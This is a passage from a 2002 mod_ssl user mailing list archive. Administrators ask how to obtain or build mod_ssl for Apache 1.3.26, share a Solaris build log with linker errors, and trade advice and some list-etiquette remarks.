Chat with friends online, try MSN Messenger: http://messenger.msn.com

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Jun 20 16:13:08 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id QAA00594; Thu, 20 Jun 2002 16:12:22 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from bouba.alxhost.com id QAA00577; Thu, 20 Jun 2002 16:12:00 +0200 (MET DST)
Received: from [212.162.175.101] (helo=lusidor2002.lusidor.com)
	by bouba.alxhost.com with esmtp (Exim 3.35 #1)
	id 17L2fB-0005a0-00; Thu, 20 Jun 2002 10:11:54 -0400
Message-Id: <5.1.0.14.0.20020620154530.02737a00@mail.lusidor.com>
X-Sender: lusidor@mail.lusidor.com
X-Mailer: QUALCOMM Windows Eudora Version 5.1
Date: Thu, 20 Jun 2002 16:11:44 +0200
To: modssl-users@modssl.org
From: Jimmy Lantz 
Subject: Re: Apache_1.3.26-Mod_SSL_x-OpenSSL_x - Emergency
Cc: jimlee2@hotmail.com
In-Reply-To: 
Mime-Version: 1.0
Content-Type: text/plain; charset="us-ascii"; format=flowed
X-AntiAbuse: This header was added to track abuse, please include it with any abuse report
X-AntiAbuse: Primary Hostname - bouba.alxhost.com
X-AntiAbuse: Original Domain - modssl.org
X-AntiAbuse: Originator/Caller UID/GID - [0 0] / [0 0]
X-AntiAbuse: Sender Address Domain - lusidor.com
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Jimmy Lantz 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Jim,
I'm sorry to say that I cant help you with your problem below,

however, I can give you a tip,

since this is a by the users for the users kind of list and *NOT* a paid 
service,
expressing your immediate need rarely give you the help requested.

Try a more humble writing style or hire a proffesional programmer, or maybe 
your in luck and somebody will give your need priority and give you the 
help requested, more often you'll get unlucky than lucky with your current 
aproach though.

Best of luck
Jimmy in Sweden.

Better frased like this:

Dear user-group gurus,

I wonder if someone might be able to give me an ETA on the 
Apache_1.3.26-Mod_SSL_x-OpenSSL_x file,
your help is very much appreciated.

Best midsummer solstice greetings
Jim.

Chinese version:
Ni zheyang xie, zhende buxing!
Xuyao xie limao yidianr!
Tamen bu renshi ni ya, ye bushi ni fu qian de yi zhong fuwu ma!
Ruguo, ni zhende quyao zuo zhege update, weishenme ni bu yong yi wei 
jisuanjizhuanjia! Fu ta liang qian meiyuan, jiu meiyou wenta ya!
Zaijian!


At 13:37 2002-06-20 +0000, you wrote:
>Hi,
>
>We immediately need the Apache_1.3.26-Mod_SSL_x-OpenSSL_x file so that we 
>can upgrade our Apache server to 1.3.26 with mod_ssl.
>
>This is an emergency since we need to get this done immediately.
>
>We have been constantly looking at the http://www.modssl.org/contrib/ 
>area, with no luck.
>
>We seek immediate attention from the mod_ssl user community.
>
>Bye,
>-Jim.
>
>_________________________________________________________________
>Chat with friends online, try MSN Messenger: http://messenger.msn.com
>
>______________________________________________________________________
>Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
>User Support Mailing List                      modssl-users@modssl.org
>Automated List Manager                            majordomo@modssl.org
>

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Jun 20 16:32:16 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id QAA02121; Thu, 20 Jun 2002 16:31:15 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from hotmail.com id QAA02100; Thu, 20 Jun 2002 16:30:56 +0200 (MET DST)
Received: from mail pickup service by hotmail.com with Microsoft SMTPSVC;
	 Thu, 20 Jun 2002 07:30:50 -0700
Received: from 204.115.33.236 by lw7fd.law7.hotmail.msn.com with HTTP;
	Thu, 20 Jun 2002 14:30:49 GMT
X-Originating-IP: [204.115.33.236]
From: "Jim Lee" 
To: modssl-users@modssl.org
Subject: Re: Apache_1.3.26-Mod_SSL_x-OpenSSL_x - Emergency
Date: Thu, 20 Jun 2002 14:30:49 +0000
Mime-Version: 1.0
Content-Type: text/plain; format=flowed
Message-ID: 
X-OriginalArrivalTime: 20 Jun 2002 14:30:50.0282 (UTC) FILETIME=[133650A0:01C21867]
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Jim Lee" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Hi,

Thanks for you tip.

Since i am new to the community i was unware of it. I apologize for my 
mistake.

I request my brothers and sisters in the community to help me out.

Thanks and Regards,

Bye,
-Jim.

Jim,
I'm sorry to say that I cant help you with your problem below,

however, I can give you a tip,

since this is a by the users for the users kind of list and *NOT* a
paid service, expressing your immediate need rarely give you the help 
requested.

Try a more humble writing style or hire a proffesional programmer,
or maybe your in luck and somebody will give your need priority and give you 
the help requested, more often you'll get unlucky than lucky with your 
current aproach though.

Best of luck
Jimmy in Sweden.

Better frased like this:

Dear user-group gurus,

I wonder if someone might be able to give me an ETA on the
Apache_1.3.26-Mod_SSL_x-OpenSSL_x file,your help is very much appreciated.

Best midsummer solstice greetings
Jim.

Chinese version:
Ni zheyang xie, zhende buxing!
Xuyao xie limao yidianr!
Tamen bu renshi ni ya, ye bushi ni fu qian de yi zhong fuwu ma!
Ruguo, ni zhende quyao zuo zhege update, weishenme ni bu yong yi wei
jisuanjizhuanjia! Fu ta liang qian meiyuan, jiu meiyou wenta ya!
Zaijian!


At 13:37 2002-06-20 +0000, you wrote:
Hi,

We immediately need the Apache_1.3.26-Mod_SSL_x-OpenSSL_x file so
that we can upgrade our Apache server to 1.3.26 with mod_ssl.

This is an emergency since we need to get this done immediately.
We have been constantly looking at the http://www.modssl.org/contrib/
area, with no luck.

We seek immediate attention from the mod_ssl user community.
Bye,
-Jim.



_________________________________________________________________
Join the world’s largest e-mail service with MSN Hotmail. 
http://www.hotmail.com

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Jun 20 17:47:27 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id RAA07981; Thu, 20 Jun 2002 17:47:08 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from iaweb02.ifmc.org id RAA07763; Thu, 20 Jun 2002 17:45:10 +0200 (MET DST)
Received: from GW5DOM2-MTA by iaweb02.ifmc.org
	with Novell_GroupWise; Thu, 20 Jun 2002 10:04:58 -0500
Message-Id: 
X-Mailer: Novell GroupWise Internet Agent 6.0.1
Date: Thu, 20 Jun 2002 10:04:40 -0500
From: "Mary Peterson" 
To: 
Subject: Expired and Revoked Certificates
Mime-Version: 1.0
Content-Type: text/plain; charset=US-ASCII
Content-Transfer-Encoding: 7bit
Content-Disposition: inline
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Mary Peterson" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

I have two issues that I wondered if anyone could assist me with:

When I test a revoked client certificate against the CRL I get a
Security Alert Message that says 'The security certificate for this site
has been revoked.  This site should not be trusted.'

This sounds like the site that the user wants to access has a revoked
server certificate NOT the client certificate.  I have verified in the
error report that the client ssl hand-shake failed due to the CLIENT
CERTIFICATE being revoked, so why does the message say what it does?  

Also, when I test an expired client certificate it brings back a 'Page
Cannot be Displayed' error message.  Does anyone know how I can get it
to return a 'Your certificate has expired' error message in place of the
'Page Cannot be Displayed' message?

I would appreciate any help that anyone might have to offer.  Thanks!
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Jun 20 19:17:14 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id TAA15174; Thu, 20 Jun 2002 19:16:16 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from hotmail.com id TAA15142; Thu, 20 Jun 2002 19:15:45 +0200 (MET DST)
Received: from mail pickup service by hotmail.com with Microsoft SMTPSVC;
	 Thu, 20 Jun 2002 10:15:38 -0700
Received: from 204.115.33.236 by lw7fd.law7.hotmail.msn.com with HTTP;
	Thu, 20 Jun 2002 17:15:38 GMT
X-Originating-IP: [204.115.33.236]
From: "Jim Lee" 
To: modssl-users@modssl.org
Subject: Re: Apache 1.3.26 Upgrade Question
Date: Thu, 20 Jun 2002 17:15:38 +0000
Mime-Version: 1.0
Content-Type: text/plain; format=flowed
Message-ID: 
X-OriginalArrivalTime: 20 Jun 2002 17:15:38.0724 (UTC) FILETIME=[192ED240:01C2187E]
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Jim Lee" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users


Hi,

Could somebody help me create the Apache_1.3.26-Mod_SSL_x-OpenSSL_x file 
from the mod_ssl-2.8.9-1.3.26.tar.gz file that has been released recently.

Thanks.

Bye,
-Jim.


On Wed, 19 Jun 2002, Jim Lee wrote:

We have been unable to find the above Apache_1.3.26-Mod_SSL_x file in the 
http://www.modssl.org/contrib/ area.

Nobody's contributed one yet.  I imagine it won't be that far off, it
usually doesn't take too long.

We also wish to know if the SSL certificate has to be re-created after
Apache is upgraded to 1.3.26 with the new mod_SSL.

No.

--Cliff



_________________________________________________________________
Chat with friends online, try MSN Messenger: http://messenger.msn.com

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Jun 20 19:26:09 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id TAA15930; Thu, 20 Jun 2002 19:25:16 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from thunderer.cnchost.com id TAA15865; Thu, 20 Jun 2002 19:24:15 +0200 (MET DST)
Received: from LAP012 (host-30.whitepj.net [63.145.241.30] (may be forged))
	by thunderer.cnchost.com
	id NAA18672; Thu, 20 Jun 2002 13:24:08 -0400 (EDT)
	[ConcentricHost SMTP Relay 1.14]
From: "Gilles Gros" 
To: 
Subject: RE: Apache 1.3.26 Upgrade Question
Date: Thu, 20 Jun 2002 10:24:07 -0700
Message-ID: 
MIME-Version: 1.0
Content-Type: text/plain;
	charset="iso-8859-1"
Content-Transfer-Encoding: 7bit
X-Priority: 3 (Normal)
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook IMO, Build 9.0.2416 (9.0.2911.0)
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000
In-Reply-To: 
Importance: Normal
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Gilles Gros" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

What is really your question ?

Just download the source and compile it.

apache 1.3.26 : http://www.apache.org/dist/httpd/apache_1.3.26.tar.gz
mod SSL 2.8.9-1.3.26 :
http://www.modssl.org/source/mod_ssl-2.8.9-1.3.26.tar.gz

Gilles

> -----Original Message-----
> From: owner-modssl-users@modssl.org
> [mailto:owner-modssl-users@modssl.org]On Behalf Of Jim Lee
> Sent: Thursday, June 20, 2002 10:16 AM
> To: modssl-users@modssl.org
> Subject: Re: Apache 1.3.26 Upgrade Question
>
>
>
> Hi,
>
> Could somebody help me create the Apache_1.3.26-Mod_SSL_x-OpenSSL_x file
> from the mod_ssl-2.8.9-1.3.26.tar.gz file that has been released recently.
>
> Thanks.
>
> Bye,
> -Jim.
>
>
> On Wed, 19 Jun 2002, Jim Lee wrote:
>
> We have been unable to find the above Apache_1.3.26-Mod_SSL_x file in the
> http://www.modssl.org/contrib/ area.
>
> Nobody's contributed one yet.  I imagine it won't be that far off, it
> usually doesn't take too long.
>
> We also wish to know if the SSL certificate has to be re-created after
> Apache is upgraded to 1.3.26 with the new mod_SSL.
>
> No.
>
> --Cliff
>
>
>
> _________________________________________________________________
> Chat with friends online, try MSN Messenger: http://messenger.msn.com
>
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org
>

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Jun 20 19:31:15 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id TAA16232; Thu, 20 Jun 2002 19:30:13 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from smtp.vasco.com id TAA16208; Thu, 20 Jun 2002 19:29:47 +0200 (MET DST)
Received: from 226.balt.vasco.com ([209.140.121.226]) by smtp.vasco.com with Microsoft SMTPSVC(5.0.2195.4905);
	 Thu, 20 Jun 2002 19:32:26 +0200
From: "Aryeh Katz" 
To: modssl-users@modssl.org
Received: from espanol.sytrix.com by 226.balt.vasco.com
          via smtpd (for [62.58.124.117]) with SMTP; 20 Jun 2002 17:29:46 UT
Date: Thu, 20 Jun 2002 13:30:23 -0400
MIME-Version: 1.0
Subject: Re: Apache 1.3.26 Upgrade Question
Message-ID: <3D11D8EF.21288.1F8CA98C@localhost>
In-reply-to: 
X-mailer: Pegasus Mail for Windows (v4.01)
Content-type: text/plain; charset=US-ASCII
Content-transfer-encoding: 7BIT
Content-description: Mail message body
X-OriginalArrivalTime: 20 Jun 2002 17:32:26.0967 (UTC) FILETIME=[72247E70:01C21880]
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Aryeh Katz" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

> 
> Hi,
> 
> Could somebody help me create the Apache_1.3.26-Mod_SSL_x-OpenSSL_x
> file from the mod_ssl-2.8.9-1.3.26.tar.gz file that has been released
> recently.
what platform? unix requires nothing more than a configure in the mod_ssl 
directory, followed by make. Win32 is a little more cumbersome.
Aryeh

---
Aryeh Katz
VASCO 			
www.vasco.com		

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Jun 20 19:31:19 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id TAA16242; Thu, 20 Jun 2002 19:30:23 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from it0033.it-action.com id TAA16177; Thu, 20 Jun 2002 19:29:09 +0200 (MET DST)
Received: from itaction.co.uk ([212.36.137.30]) by
          it0033.it-action.com (Netscape Messaging Server 4.15) with ESMTP
          id GY0LWF00.63L for ; Thu, 20 Jun 2002
          18:29:03 +0100 
Message-ID: <3D1210DE.3050504@itaction.co.uk>
Date: Thu, 20 Jun 2002 18:29:02 +0100
From: "Peter Viertel" 
Organization: IT Action Ltd
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US; rv:1.0.0+) Gecko/20020429
X-Accept-Language: en-gb, en
MIME-Version: 1.0
To: modssl-users@modssl.org
Subject: Re: Apache 1.3.26 Upgrade Question
References: 
Content-Type: text/plain; charset=us-ascii; format=flowed
Content-Transfer-Encoding: 7bit
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Peter Viertel" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Why dont you just buy Stronghold? Sounds like you ought to be paying 
someone to do this work for you.

   -->> http://www.redhat.com/software/apache/stronghold/index.html

Jim Lee wrote:

>
> Hi,
>
> Could somebody help me create the Apache_1.3.26-Mod_SSL_x-OpenSSL_x 
> file from the mod_ssl-2.8.9-1.3.26.tar.gz file that has been released 
> recently.
>
> Thanks.
>
> Bye,
> -Jim.
>
>
> On Wed, 19 Jun 2002, Jim Lee wrote:
>
> We have been unable to find the above Apache_1.3.26-Mod_SSL_x file in 
> the http://www.modssl.org/contrib/ area.
>
> Nobody's contributed one yet.  I imagine it won't be that far off, it
> usually doesn't take too long.
>
> We also wish to know if the SSL certificate has to be re-created after
> Apache is upgraded to 1.3.26 with the new mod_SSL.
>
> No.
>
> --Cliff
>
>
>
> _________________________________________________________________
> Chat with friends online, try MSN Messenger: http://messenger.msn.com
>
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org



______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Jun 20 19:32:19 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id TAA16310; Thu, 20 Jun 2002 19:31:14 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from soulshock.mail.pas.earthlink.net id TAA16237; Thu, 20 Jun 2002 19:30:15 +0200 (MET DST)
Received: from albatross.prod.itd.earthlink.net (albatross.mail.pas.earthlink.net [207.217.120.120])
	by soulshock.mail.pas.earthlink.net (8.11.6+Sun/8.11.6) with ESMTP id g5KGDiZ07125
	for ; Thu, 20 Jun 2002 09:13:44 -0700 (PDT)
Received: from kermit.mail.pas.earthlink.net ([207.217.120.241] helo=kermit.psp.pas.earthlink.net)
	by albatross.prod.itd.earthlink.net with esmtp (Exim 3.33 #2)
	id 17L4Yj-0000oq-00
	for modssl-users@modssl.org; Thu, 20 Jun 2002 09:13:21 -0700
Received: (from nobody@localhost)
	by kermit.psp.pas.earthlink.net (8.10.2+Sun/8.10.2) id g5KGDLV13724
	for modssl-users@modssl.org; Thu, 20 Jun 2002 09:13:21 -0700 (PDT)
Date: Thu, 20 Jun 2002 09:13:20 -0700
From: RON MCKEEVER
To: modssl-users@modssl.org
Subject: Upgrade Question
Message-ID: 
X-Originating-IP: 134.9.11.140
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: RON MCKEEVER
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Hi 

I currently have mod_ssl-2.8.7-1.3.23(apache) deal. I have seen the security issue and the suggetions to upgrade to 2.0 or 1.3.26. 

Couple of questions, Please.
1. Can I just install the new apache version over my old install? And will it still use my ssl info? If not is there a command I can run when I configure the new apache to not overright all my info in /opt/apache?

2. Or do I need to wait for a "mod_ssl-2.x.x-1.3.26" release??

Thanks for any input,
Rob
 
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Jun 20 19:34:15 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id TAA16513; Thu, 20 Jun 2002 19:33:11 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from visp.engelschall.com id TAA16472; Thu, 20 Jun 2002 19:32:46 +0200 (MET DST)
Received: by visp.engelschall.com (Postfix, from userid 1005)
	id 8554E4CE794; Thu, 20 Jun 2002 19:32:44 +0200 (CEST)
Received: by en1.engelschall.com (Postfix, from userid 10000)
	id BF6D7286C5; Thu, 20 Jun 2002 19:32:05 +0200 (CEST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from hotmail.com id KAA22292; Wed, 19 Jun 2002 10:58:24 +0200 (MET DST)
Received: from mail pickup service by hotmail.com with Microsoft SMTPSVC;
	 Wed, 19 Jun 2002 01:57:18 -0700
Received: from 161.2.3.206 by lw2fd.hotmail.msn.com with HTTP;
	Wed, 19 Jun 2002 08:57:15 GMT
X-Originating-IP: [161.2.3.206]
From: "J S" 
To: modssl-users@modssl.org
Subject: problem build apache_1.3.26 with modssl
Date: Wed, 19 Jun 2002 08:57:15 +0000
Mime-Version: 1.0
Content-Type: text/plain; format=flowed
Message-ID: 
X-OriginalArrivalTime: 19 Jun 2002 08:57:18.0152 (UTC) FILETIME=[50A3DC80:01C2176F]
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "J S" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

How do I compile mod_ssl-2.8.8-1.3.24 with apache_1.3.26? When I run 
configure --with-apache=../apache_1.3.26 I get the foolowing error:


Configuring mod_ssl/2.8.8 for Apache/1.3.24
./configure:Error: The mod_ssl/2.8.8 can be used for Apache/1.3.24 only.
./configure:Error: Your Apache source tree under ../apache_1.3.26 is version 
1.3.26.
./configure:Hint:  Please use an extracted apache_1.3.24.tar.gz tarball
./configure:Hint:  with the --with-apache option, only.

Does this mean I can't build apache_1.3.26 with mod-ssl compiled in?

JS.


_________________________________________________________________
Send and receive Hotmail on your mobile device: http://mobile.msn.com
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Jun 20 19:34:22 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id TAA16516; Thu, 20 Jun 2002 19:33:14 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from visp.engelschall.com id TAA16466; Thu, 20 Jun 2002 19:32:45 +0200 (MET DST)
Received: by visp.engelschall.com (Postfix, from userid 1005)
	id 62C434CE790; Thu, 20 Jun 2002 19:32:44 +0200 (CEST)
Received: by en1.engelschall.com (Postfix, from userid 10000)
	id 5BD1D286BF; Thu, 20 Jun 2002 19:30:56 +0200 (CEST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from hutch.nm.com id HAA10240; Wed, 19 Jun 2002 07:30:29 +0200 (MET DST)
From: mjackson@axa.com.au
Received: from c2.nm.com.au (unverified) by hutch.nm.com
 (Content Technologies SMTPRS 4.2.5) with ESMTP id  for ;
 Wed, 19 Jun 2002 15:33:01 +1000
Subject: modssl for apache 1.3.26
To: modssl-users@modssl.org
X-Mailer: Lotus Notes Release 5.0.7  March 21, 2001
Message-ID: 
Date: Wed, 19 Jun 2002 15:38:25 +1000
X-MIMETrack: Serialize by Router on ELAN-MEL/AU/NMHDMZ(Release 5.0.6a |January 17, 2001) at
 06/19/2002 03:17:15 PM
MIME-Version: 1.0
Content-type: text/plain; charset="us-ascii"
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: mjackson@axa.com.au
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Does anyone now when we can expect new modssl module for 1.3.26?  Need to
upgrade due to CA-2002-17.
Would 2.8.8-1.2.24 work??

Thanks,
Mark Jackson



*********************************************************************************
Important Note
This email (including any attachments) contains information which is 
confidential and may be subject to legal privilege.  If you are not 
the intended recipient you must not use, distribute or copy this 
email.  If you have received this email in error please notify the 
sender immediately and delete this email. Any views expressed in this 
email are not necessarily the views of AXA.   Thank you.
*********************************************************************************
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Jun 20 19:34:26 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id TAA16541; Thu, 20 Jun 2002 19:33:25 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from visp.engelschall.com id TAA16465; Thu, 20 Jun 2002 19:32:45 +0200 (MET DST)
Received: by visp.engelschall.com (Postfix, from userid 1005)
	id 570554CE784; Thu, 20 Jun 2002 19:32:44 +0200 (CEST)
Received: by en1.engelschall.com (Postfix, from userid 10000)
	id A8EFF286BF; Thu, 20 Jun 2002 19:31:47 +0200 (CEST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from akslcl1.aksl.de id KAA19938; Wed, 19 Jun 2002 10:19:49 +0200 (MET DST)
From: Manuel.Bernhardt@aksl.de
Subject: Re: Apache 1.3.26 and mod_ssl
To: modssl-users@modssl.org
Cc: sven.luehrs@aksl.de, sven-knut.illig@aksl.de, maurice.kowalski@aksl.de
X-Mailer: Lotus Notes Release 5.0.9a  January 7, 2002
Message-ID: 
Date: Wed, 19 Jun 2002 10:19:42 +0200
X-MIMETrack: Serialize by Router on akslcl1/aksl(Release 5.0.5 |September 22, 2000) at
 06/19/2002 10:19:49 AM
MIME-Version: 1.0
Content-type: text/plain; charset=us-ascii
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Manuel.Bernhardt@aksl.de
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Hello there,

I've patched the Apache 1.3.26 sources with mod_ssl 2.8.8 and --force
Option and it "works" ....
I've apply the patch for 1.3.26 ....

sh-2.03# patch -p0 < modssl-2.8.8-1.3.26-fixup.patch
  Looks like a unified context diff.
  The next patch looks like a unified context diff.
  The next patch looks like a unified context diff.
  I can't seem to find a patch in there anywhere.

... and configure apache ...

./configure --with-layout=Apache --prefix=/usr/local/apache_1.3.26
--enable-module=so --enable-module=ssl --enable-shared=max

... and run an make ... and some minutes later i got this error(s):

<=== src/modules/ssl
<=== src/modules
gcc -c  -I./os/unix -I./include   -DSOLARIS2=280 -DMOD_SSL=208108 -DEAPI
-DUSE_EXPAT -I./lib/expat-lite `./apaci` modules.c
gcc -c  -I./os/unix -I./include   -DSOLARIS2=280 -DMOD_SSL=208108 -DEAPI
-DUSE_EXPAT -I./lib/expat-lite `./apaci` buildmark.c
gcc  -DSOLARIS2=280 -DMOD_SSL=208108 -DEAPI -DUSE_EXPAT -I./lib/expat-lite
`./apaci`    \
      -o httpd buildmark.o modules.o modules/standard/libstandard.a
main/libmain.a ./os/unix/libos.a ap/libap.a  lib/expat-lite/libexpat.a
-lsocket -lnsl -lpthread -ldl
Undefined                       first referenced
 symbol                             in file
ap_ctx_new                          main/libmain.a(buff.o)
ap_hook_call                        main/libmain.a(buff.o)
ap_mm_useable                       main/libmain.a(alloc.o)
ap_ctx_get                          main/libmain.a(http_core.o)
ap_hook_configure                   main/libmain.a(http_main.o)
ap_hook_init                        main/libmain.a(http_main.o)
ld: fatal: Symbol referencing errors. No output written to httpd
make[2]: *** [target_static] Error 1
make[2]: Leaving directory `/tmp/apache_update/apache_1.3.26/src'
make[1]: *** [build-std] Error 2
make[1]: Leaving directory `/tmp/apache_update/apache_1.3.26'
make: *** [build] Error 2

It looks not really good ... someone with ideas how the problem can be
fixed ?
If i compile without ssl support, it works.

compiler: gcc 2.95.2 (should work)
system: solaris 5.8

With kind regards

Manuel Bernhardt


On Tue, Jun 18, 2002 at 20:47:11 -0400, Cliff Woolley wrote:
> On Wed, 19 Jun 2002, James Bromberger wrote:
>
>> Seems that the current 2.8.8 has some problems patching into some of
>> the mod_proxy code:
>>
>> ./ap/Makefile.tmpl.rej
>> ./modules/proxy/mod_proxy.c.rej
>> ./modules/proxy/proxy_http.c.rej
>
> hmmmm... wonder why I didn't notice those before?  Sigh.  Anyway,
> attached is a patch (totally untested!) which *should* replace the
> missing part of the mod_ssl patch.  So after you've run ./configure
> --force, apply this patch by going to the apache_1.3.26/ directory and
> running "patch -p0 < modssl-2.8.8-1.3.26-fixup.patch".  Let me know if it
> works or breaks.  ;)
>
> --Cliff Works! Many thanks. --
Udo Schweigert, Siemens AG   | Voice      : +49 89 636 42170
CT IC CERT, Siemens CERT     | Fax        : +49 89 636 41166
D-81730 Muenchen / Germany   | email      : udo.schweigert@siemens.com
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Jun 20 19:34:31 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id TAA16576; Thu, 20 Jun 2002 19:33:37 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from visp.engelschall.com id TAA16462; Thu, 20 Jun 2002 19:32:45 +0200 (MET DST)
Received: by visp.engelschall.com (Postfix, from userid 1005)
	id 40BB54CE77D; Thu, 20 Jun 2002 19:32:44 +0200 (CEST)
Received: by en1.engelschall.com (Postfix, from userid 10000)
	id E79EB28843; Thu, 20 Jun 2002 19:30:41 +0200 (CEST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from tomts5-srv.bellnexxia.net id FAA29568; Wed, 19 Jun 2002 05:15:55 +0200 (MET DST)
Received: from mgla.tor ([64.231.120.122]) by tomts5-srv.bellnexxia.net
          (InterMail vM.5.01.04.19 201-253-122-122-119-20020516) with ESMTP
          id <20020619031549.PRFV12468.tomts5-srv.bellnexxia.net@mgla.tor>
          for ; Tue, 18 Jun 2002 23:15:49 -0400
Received: from linksys ([192.168.1.1] helo=ptak)
	by mgla.tor with asmtp (Exim 3.35 #1 (Debian))
